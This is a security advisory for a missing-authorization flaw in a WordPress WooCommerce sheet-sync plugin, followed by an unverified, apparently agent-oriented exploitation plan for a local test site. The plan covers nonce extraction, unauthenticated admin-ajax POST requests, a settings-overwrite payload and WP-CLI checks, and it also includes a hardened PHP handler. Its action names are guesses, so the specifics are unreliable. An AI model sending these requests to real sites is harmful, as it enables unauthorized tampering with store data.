CVE-2025-68834

Sync Master Sheet – Product Sync with Google Sheet for WooCommerce <= 1.1.3 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 5.3
Patched in: 1.1.4
Time to patch: 6d

Description

The Sync Master Sheet – Product Sync with Google Sheet for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.1.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.1.3
Published: February 4, 2026
Last updated: February 9, 2026

Source Code

WordPress.org SVN
Research Plan
Unverified

Exploitation Research Plan: CVE-2025-68834 (Sync Master Sheet)

1. Vulnerability Summary

The Sync Master Sheet – Product Sync with Google Sheet for WooCommerce plugin (<= 1.1.3) contains a missing authorization vulnerability. Specifically, it registers one or more AJAX handlers using the wp_ajax_nopriv_ hook, which allows unauthenticated access. These handlers perform sensitive actions (such as triggering product synchronization or potentially updating plugin settings) without verifying the user's capabilities via current_user_can() or adequately validating a nonce for session-bound security.

2. Attack Vector Analysis

  • Endpoint: http://<target>/wp-admin/admin-ajax.php
  • Vulnerable Action: Likely psms_sync_products or psms_save_settings (inferred from plugin functionality).
  • HTTP Method: POST
  • Payload Parameters:
    • action: The vulnerable AJAX action (e.g., psms_sync_products).
    • nonce: (If required) A token retrieved from the frontend.
    • Potential data parameters: sheet_id, sync_type, or configuration keys.
  • Preconditions: The plugin must be active. Some sync actions may require a valid Google Sheet ID to be configured, or the attacker may provide one in the request if the handler allows settings updates.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers AJAX hooks in the constructor of its main class or an admin class (e.g., includes/class-product-sync-master-sheet-admin.php or admin/class-psms-admin.php).
    • Hook: add_action( 'wp_ajax_nopriv_psms_sync_products', array( $this, 'psms_sync_products_callback' ) );
  2. Callback Execution: The psms_sync_products_callback function is invoked.
  3. Missing Check: The function fails to call if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }.
  4. Action Sink: The function proceeds to trigger Psms_Sync_Handler::start_sync() or similar logic, leading to unauthorized modification of the site's product database based on remote Google Sheet data.
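As an added illustration that is not the plugin's own code (the page gives the code flow only as inferred), the registration pattern described above is shown beside a hardened handler; the names psms_sync_products, psms_sync_products_callback and Psms_Sync_Handler::start_sync are assumed from the inferred flow.

```php
<?php
// Hypothetical handler illustrating the missing-authorization pattern the
// advisory describes, beside a hardened version. Hook, function and class
// names (psms_*, Psms_Sync_Handler) are assumed, not the plugin's real code.

// --- Vulnerable pattern (as inferred in the code flow above) ---
// Registering on wp_ajax_nopriv_ makes the callback reachable by logged-out
// visitors, and it performs a privileged action with no capability check.
add_action( 'wp_ajax_psms_sync_products',        'psms_sync_products_callback_vulnerable' );
add_action( 'wp_ajax_nopriv_psms_sync_products', 'psms_sync_products_callback_vulnerable' );

function psms_sync_products_callback_vulnerable() {
    $sheet_id = isset( $_POST['sheet_id'] ) ? sanitize_text_field( wp_unslash( $_POST['sheet_id'] ) ) : '';
    Psms_Sync_Handler::start_sync( $sheet_id ); // state-changing side effect, no authorization
    wp_send_json_success( 'Sync started' );
}

// --- Hardened pattern ---
// 1. Register only on wp_ajax_ (logged-in users); never wp_ajax_nopriv_ for
//    state-changing actions.
// 2. Verify an action-specific nonce (CSRF protection only).
// 3. Check a capability: this is the authorization step a nonce cannot replace,
//    since a nonce localized into a front-end script is readable by any visitor.
add_action( 'wp_ajax_psms_sync_products', 'psms_sync_products_callback_hardened' );

function psms_sync_products_callback_hardened() {
    check_ajax_referer( 'psms_sync_products', 'nonce' ); // dies with 403 on a bad/missing nonce

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Insufficient permissions', 403 );
    }

    $sheet_id = isset( $_POST['sheet_id'] ) ? sanitize_text_field( wp_unslash( $_POST['sheet_id'] ) ) : '';
    if ( '' === $sheet_id ) {
        wp_send_json_error( 'Missing sheet_id', 400 );
    }

    Psms_Sync_Handler::start_sync( $sheet_id );
    wp_send_json_success( 'Sync started' );
}

// Emit the nonce on admin screens only, never into a public-facing script.
add_action( 'admin_enqueue_scripts', function () {
    wp_enqueue_script( 'psms-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), false, true );
    wp_localize_script( 'psms-admin', 'psms_ajax_obj', array(
        'ajax_url' => admin_url( 'admin-ajax.php' ),
        'nonce'    => wp_create_nonce( 'psms_sync_products' ),
    ) );
} );
```

The capability check, not the nonce, is what closes the reported issue: removing the wp_ajax_nopriv_ registration alone still leaves any logged-in subscriber able to trigger the sync.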

4. Nonce Acquisition Strategy

If the handler uses check_ajax_referer or wp_verify_nonce, the nonce is likely exposed via wp_localize_script.

  1. Identify Script Localization: Search the codebase for wp_localize_script. Look for a variable name like psms_ajax_obj or psms_vars.
  2. Determine Page Trigger: Identify which page/shortcode enqueues this script. It is likely the main WooCommerce shop page or a specific product page.
  3. Create a Test Page:
    # Check for shortcodes
    grep -r "add_shortcode" .
    # If a shortcode like [psms_sync_button] exists:
    wp post create --post_type=page --post_status=publish --post_title="Sync Test" --post_content='[psms_sync_button]'
    
  4. Extraction:
    • Navigate to the page using browser_navigate.
    • Execute: browser_eval("window.psms_ajax_obj?.nonce") (Verify variable name in source).

5. Exploitation Strategy

Step 1: Discover the exact AJAX action

Since source files are not provided, the agent must first identify the vulnerable hook.

grep -rn "wp_ajax_nopriv_" wp-content/plugins/product-sync-master-sheet/

Step 2: Analyze the callback

Examine the callback function for the identified action. Check for current_user_can and identify required parameters.

# Example if the action is psms_sync_products
grep -r "function psms_sync_products" wp-content/plugins/product-sync-master-sheet/

Step 3: Craft the Exploit Request

Assuming the action is psms_sync_products and it triggers a sync:

HTTP Request:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body: action=psms_sync_products&nonce=<EXTRACTED_NONCE>&any_other_param=value

Step 4: Unauthorized Settings Modification (If applicable)

If a handler like psms_save_settings is exposed:
Body: action=psms_save_settings&nonce=<NONCE>&psms_google_sheet_id=MALICIOUS_SHEET_ID

6. Test Data Setup

  1. Install Plugin: Ensure product-sync-master-sheet version 1.1.3 is installed.
  2. WooCommerce Setup: Ensure WooCommerce is installed and active, as the plugin depends on it.
  3. Configuration: (Optional) Add a dummy Google Sheet ID in the plugin settings via WP-CLI to simulate a configured environment:
    wp option update psms_settings '{"sheet_id":"1A2B3C4D5E", "sync_enabled":"yes"}' --format=json
    

7. Expected Results

  • Success Response: The server returns a 200 OK with a JSON body such as {"success":true, "data":"Sync started"} or {"status":"updated"}.
  • Action Taken: The plugin initiates a network request to Google APIs (observable in logs) or modifies WooCommerce product data. If settings are the target, the psms_settings option in the database will be changed.

8. Verification Steps

After sending the HTTP request, use WP-CLI to verify the state:

  1. Check Options:
    wp option get psms_settings
    
  2. Check Sync Logs (if any):
    wp post list --post_type=product --orderby=post_modified --posts_per_page=5
    
    (Check whether products were modified at the time the request was sent.)

9. Alternative Approaches

If no wp_ajax_nopriv_ hooks are found, check for:

  • REST API Routes: grep -r "register_rest_route" and look for routes missing the permission_callback or using __return_true.
  • admin_init Hooks: Search for code running on admin_init without is_admin() or capability checks. admin-ajax.php triggers admin_init even for unauthenticated users.
  • Generic Nonces: If check_ajax_referer( 'psms_nonce', ... ) is used, check if the psms_nonce is leaked on the frontend for all visitors.
